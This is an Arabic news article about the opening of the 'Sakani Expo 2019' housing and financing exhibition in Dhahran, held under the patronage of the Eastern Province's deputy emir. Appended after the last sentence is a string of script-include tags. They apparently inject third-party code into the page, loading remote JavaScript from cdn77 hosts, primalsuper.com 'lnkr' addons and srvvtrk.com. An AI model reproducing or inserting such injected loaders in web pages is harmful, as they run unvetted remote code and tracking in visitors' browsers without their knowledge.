شكرا لقرائتكم خبر عن نائب أمير الشرقية يرعى انطلاق «سكني اكسبو» بالظهران اليوم والان نبدء بالتفاصيل

حلول سكنية وتمويلية لمستفيدي «الإسكان» و«العقاري» على مدى 10 أيام

طرح أحدث النماذج والتصاميم السكنية وأفضل مواد البناء وأكثرها جودة

يرعى صاحب السمو الملكي الأمير أحمد بن فهد بن سلمان بن عبدالعزيز نائب أمير المنطقة الشرقية اليوم الخميس، حفل افتتاح معرض «سكني اكسبو 2019 بالظهران» والذي تنظمه وزارة الإسكان وصندوق التنمية العقارية لخدمة مستفيدي برنامج «سكني» عبر تقديم حلول سكنية وتمويلية شاملة تمكنهم من تملك مسكنهم الأول، وذلك خلال الفترة من 7 إلى 16 فبراير الجاري على أرض مركز «الظهران الدولي للمعارض».

ويأتي المعرض في ظل النجاحات التي حققها سكني اكسبو الرياض 2018، وما شهده من إقبال كبير من مستفيدي الوزارة والصندوق في المنطقة الوسطى، وتسعى وزارة الإسكان وصندوق التنمية العقارية من خلاله إلى تمكين مستفيدي برنامج «سكني» من تيسير رحلتهم لتملك «مسكنهم الأول» من خلال جمع مختلف الجهات ذات العلاقة من مطورين، وعقاريين، ومقاولين، وجهات حكومية، ومؤسسات تمويلية، وتوفير كل حلول الإسكان والتمويل تحت سقف واحد.

ويفتح المعرض أبوابه للمستفيدين يوميا من الساعة 4 - 10 مساء يوميا، ويتيح لهم فرصة الالتقاء «بالمستشار العقاري» لتزويدهم بمجموعة من الحلول السكنية والتمويلية التي تساعدهم على الحصول على المسكن الذي يلبي رغباتهم ويناسب قدراتهم، كما يتيح لهم فرصة الالتقاء بالمطورين والمقاولين والممولين والجهات المعنية بتوفير مختلف الخدمات اللازمة للمسكن، والتعرف على أحدث النماذج والتصاميم السكنية وأفضل مواد البناء وأكثرها جودة، والتعرف على منظومة الحلول التمويلية التي يقدمها صندوق التنمية العقارية بالشراكة مع الجهات التمويلية للحصول على «القرض العقاري المدعوم» ضمن مجموعة من البرامج السهلة والميسرة التي تلائم مختلف الشرائح.

ويتيح برنامج سكني للمستفيدين عدة خيارات سكنية وتمويلية تشمل الوحدات السكنية الجاهزة ضمن مشاريع الوزارة وكذلك الوحدات تحت الإنشاء بالشراكة مع المطوّرين العقاريين المؤهلين، بالإضافة لخيار شراء الوحدات السكنية الجاهزة من السوق، والبناء الذاتي لمن يمتلكون الأراضي، أو تمويل القرض العقاري القائم، من خلال القروض العقارية المدعومة بالشراكة مع البنوك والمؤسسات التمويلية، إضافة لخيار الأراضي المجانية التي تسلم للمستفيدين في مختلف مناطق المملكة.

ويسعى البرنامج لتمكين المواطنين المدرجين في قوائم الوزارة وصندوق التنمية العقارية من الحصول على السكن المناسب، ورفع نسبة التملك بين المواطنين إلى 60% بحلول عام 2020 والوصول إلى 70% عام 2030 ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_138634469&key=1fd3b038f796d0b159&cv=1549461430&t=1549461429753" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_709154666&key=1fd3b038f796d0b159&cv=11024&t=1549461429754" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549461429758" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********